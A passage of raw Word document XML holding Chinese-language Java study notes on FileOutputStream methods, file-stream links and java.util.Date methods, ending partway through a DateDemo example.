          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65004509" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>File f = new File("C:/java/hello");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56654C93" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>OutputStream fOut = new FileOutputStream(f);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0737893C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78987080" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public void close() throws IOException{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B20D710" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>关闭此文件输入流并释放与此流有关的所有系统资源。抛出</w:t>
      </w:r>
      <w:r>
        <w:t>IOException</w:t>
      </w:r>
      <w:r>
        <w:t>异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E73E55" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>protected void finalize()throws IOException {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134EFB3A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法清除与该文件的连接。确保在不再引用文件输入流时调用其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> close </w:t>
      </w:r>
      <w:r>
        <w:t>方法。抛出</w:t>
      </w:r>
      <w:r>
        <w:t>IOException</w:t>
      </w:r>
      <w:r>
        <w:t>异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5808AA53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public void write(int w)throws IOException{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7B0C37" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法把指定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>字节</w:t>
      </w:r>
      <w:r>
        <w:t>写到输出流中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E908090" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public void write(byte[] w)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A0BAF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>把指定数组中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>w.length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>长度的字节</w:t>
      </w:r>
      <w:r>
        <w:t>写到</w:t>
      </w:r>
      <w:r>
        <w:t>OutputStream</w:t>
      </w:r>
      <w:r>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2931D82C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ByteArrayOutputStream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783ED12B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://www.runoob.com/java/java-bytearrayoutputstream.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEB5FE0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>DataOutputStream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC9D498" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://www.runoob.com/java/java-dataoutputstream.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ED71E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7136BA73" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9BB554" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F88328D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27083FAA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="027F1ABA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61310D5D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DA80AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2687602A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3280F3A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除目录或文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180F9FE4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A75A1FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD3DDD7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FileReader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F28222" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49772419" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FileWriter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB0B370" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E0C027" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34388ABC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="782F1DB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42940A5D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="445E68A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74E0AFF8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="732" w:name="_Toc159780161"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java.util.Arrays.Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：日期和时间</w:t>
      </w:r>
      <w:bookmarkEnd w:id="732"/>
    </w:p>
    <w:p w14:paraId="6ACBA1DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Date( )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210DCDB1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传参的话可以传入一个毫秒数，该参数是从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1970 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日起的毫秒数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2998C583" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Date(long millisec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DDEDA2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F23EC9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>boolean after(Date date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585F842D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>若当调用此方法的</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象在指定日期之后返回</w:t>
      </w:r>
      <w:r>
        <w:t>true,</w:t>
      </w:r>
      <w:r>
        <w:t>否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635EA669" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4122F1D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>boolean before(Date date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A4D44A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>若当调用此方法的</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象在指定日期之前返回</w:t>
      </w:r>
      <w:r>
        <w:t>true,</w:t>
      </w:r>
      <w:r>
        <w:t>否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72711F81" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78D2852E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Object clone( )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4C3683" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>返回此对象的副本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D422B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A44D29A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>int compareTo(Date date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5004B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>比较当调用此方法的</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象和指定日期。两者相等时候返回</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。调用对象在指定日期之前则返回负数。调用对象在指定日期之后则返回正数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D083E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4760A542" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>int compareTo(Object obj)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B0B03D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>若</w:t>
      </w:r>
      <w:r>
        <w:t>obj</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>类型则操作等同于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">compareTo(Date) </w:t>
      </w:r>
      <w:r>
        <w:t>。否则它抛出</w:t>
      </w:r>
      <w:r>
        <w:t>ClassCastException</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5265F724" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CC6F7E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>boolean equals(Object date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6820E188" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>当调用此方法的</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象和指定日期相等时候返回</w:t>
      </w:r>
      <w:r>
        <w:t>true,</w:t>
      </w:r>
      <w:r>
        <w:t>否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50791A56" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50F43FB7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>long getTime( )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453D2D97" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>返回自</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1970 </w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:t>日</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 00:00:00 GMT </w:t>
      </w:r>
      <w:r>
        <w:t>以来此</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Date </w:t>
      </w:r>
      <w:r>
        <w:t>对象表示的毫秒数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570AD917" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56371C06" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>int hashCode( )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3AF5C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>返回此对象的哈希码值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF2FCAD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D45395" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>void setTime(long time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57977A0E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>用自</w:t>
      </w:r>
      <w:r>
        <w:t>1970</w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>日</w:t>
      </w:r>
      <w:r>
        <w:t>00:00:00 GMT</w:t>
      </w:r>
      <w:r>
        <w:t>以后</w:t>
      </w:r>
      <w:r>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒数设置时间和日期。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69325FBF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C901B78" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>String toString( )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7AB8D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>把此</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Date </w:t>
      </w:r>
      <w:r>
        <w:t>对象转换为以下形式的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> String</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dow mon dd hh:mm:ss zzz yyyy </w:t>
      </w:r>
      <w:r>
        <w:t>其中：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dow </w:t>
      </w:r>
      <w:r>
        <w:t>是一周中的某一天</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Sun, Mon, Tue, Wed, Thu, Fri, Sat)</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3210E4D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取当前时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D271D49" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import java.util.Date;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709B60EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E20AB0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public class DateDemo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C0CA64" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2150F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Date </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652C107C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       Date date = new Date();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66814F71" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D19F8F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
